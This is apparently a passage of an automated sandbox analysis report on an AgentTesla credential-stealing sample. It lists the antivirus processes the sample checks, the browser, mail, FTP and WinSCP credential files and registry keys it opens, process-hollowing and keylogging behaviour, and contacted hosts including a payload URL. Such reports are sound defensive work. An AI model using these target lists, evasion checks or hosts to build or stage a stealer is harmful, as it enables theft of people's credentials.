Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara detected Credential Stealer
Source: Yara match File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560318 Sample: RFQ_PO_N39859JFK_ORDER_SPEC... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 107 s82.gocheapweb.com 2->107 109 gxe0.com 2->109 111 api.ipify.org 2->111 141 Found malware configuration 2->141 143 Malicious sample detected (through community Yara rule) 2->143 145 Antivirus detection for dropped file 2->145 147 12 other signatures 2->147 11 cmd.exe 1 2->11         started        13 Wisrysxl.PIF 2->13         started        16 Wisrysxl.PIF 2->16         started        18 2 other processes 2->18 signatures3 process4 signatures5 20 x.exe 1 7 11->20         started        25 extrac32.exe 8 11->25         started        27 conhost.exe 11->27         started        177 Antivirus detection for dropped file 13->177 179 Multi AV Scanner detection for dropped file 13->179 181 Machine Learning detection for dropped file 13->181 183 Allocates many large memory junks 13->183 29 lxsyrsiW.pif 13->29         started        185 Writes to foreign memory regions 16->185 187 Allocates memory in foreign processes 16->187 189 Sample uses process hollowing technique 16->189 31 lxsyrsiW.pif 16->31         started        process6 dnsIp7 113 gxe0.com 198.252.105.91, 443, 49712, 49713 HAWKHOSTCA Canada 20->113 99 C:\Users\Public\Libraries\lxsyrsiW.pif, PE32 20->99 dropped 101 C:\Users\Public\Wisrysxl.url, MS 20->101 dropped 103 C:\Users\Public\Libraries\Wisrysxl, data 20->103 dropped 169 Antivirus detection for dropped file 20->169 171 Multi AV Scanner detection for dropped file 20->171 173 Machine Learning detection for dropped file 20->173 175 6 other signatures 20->175 33 lxsyrsiW.pif 4 20->33         started        37 cmd.exe 1 20->37         started        39 esentutl.exe 2 20->39         started        105 C:\Users\user\AppData\Local\Temp\x.exe, PE32 25->105 dropped 41 conhost.exe 27->41         started        43 neworigin.exe 29->43         started        45 server_BTC.exe 29->45         started        47 neworigin.exe 31->47         started        49 server_BTC.exe 31->49         started        file8 signatures9 process10 file11 85 C:\Users\user\AppData\...\server_BTC.exe, PE32 33->85 dropped 87 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 33->87 dropped 89 C:\Program Files (x86)\...\armsvc.exe, PE32 33->89 dropped 119 Drops executable to a common third party application directory 33->119 121 Infects executable files (exe, dll, sys, html) 33->121 51 server_BTC.exe 7 33->51         started        55 neworigin.exe 15 2 33->55         started        58 esentutl.exe 2 37->58         started        60 esentutl.exe 2 37->60         started        62 conhost.exe 37->62         started        91 C:\Users\Public\Libraries\Wisrysxl.PIF, PE32 39->91 dropped 64 conhost.exe 39->64         started        123 Installs a global keyboard hook 43->123 125 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 47->125 127 Tries to steal Mail credentials (via file / registry access) 47->127 129 Tries to harvest and steal ftp login credentials 47->129 131 Tries to harvest and steal browser information (history, passwords, etc) 47->131 signatures12 process13 dnsIp14 93 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 51->93 dropped 149 Antivirus detection for dropped file 51->149 151 Multi AV Scanner detection for dropped file 51->151 153 Machine Learning detection for dropped file 51->153 167 2 other signatures 51->167 66 TrojanAIbot.exe 51->66         started        69 powershell.exe 51->69         started        71 cmd.exe 51->71         started        73 schtasks.exe 51->73         started        115 s82.gocheapweb.com 51.195.88.199, 49749, 49769, 49781 OVHFR France 55->115 117 api.ipify.org 104.26.13.205, 443, 49742, 49775 CLOUDFLARENETUS United States 55->117 155 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 55->155 157 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 55->157 159 Tries to steal Mail credentials (via file / registry access) 55->159 95 C:\Users\Public\alpha.pif, PE32 58->95 dropped 161 Drops PE files to the user root directory 58->161 163 Drops PE files with a suspicious file extension 58->163 165 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 58->165 97 C:\Users\Public\xpha.pif, PE32 60->97 dropped file15 signatures16 process17 signatures18 133 Antivirus detection for dropped file 66->133 135 Multi AV Scanner detection for dropped file 66->135 137 Machine Learning detection for dropped file 66->137 139 Loading BitLocker PowerShell Module 69->139 75 conhost.exe 69->75         started        77 WmiPrvSE.exe 69->77         started        79 conhost.exe 71->79         started        81 timeout.exe 71->81         started        83 conhost.exe 73->83         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.252.105.91
 gxe0.com Canada
20068 HAWKHOSTCA false
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false
51.195.88.199
 s82.gocheapweb.com France
16276 OVHFR false

Contacted Domains

Name IP Active
gxe0.com 198.252.105.91 true
api.ipify.org 104.26.13.205 true
s82.gocheapweb.com 51.195.88.199 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    https://gxe0.com/yak/233_Wisrysxlfss true
    • Avira URL Cloud: safe
    		 unknown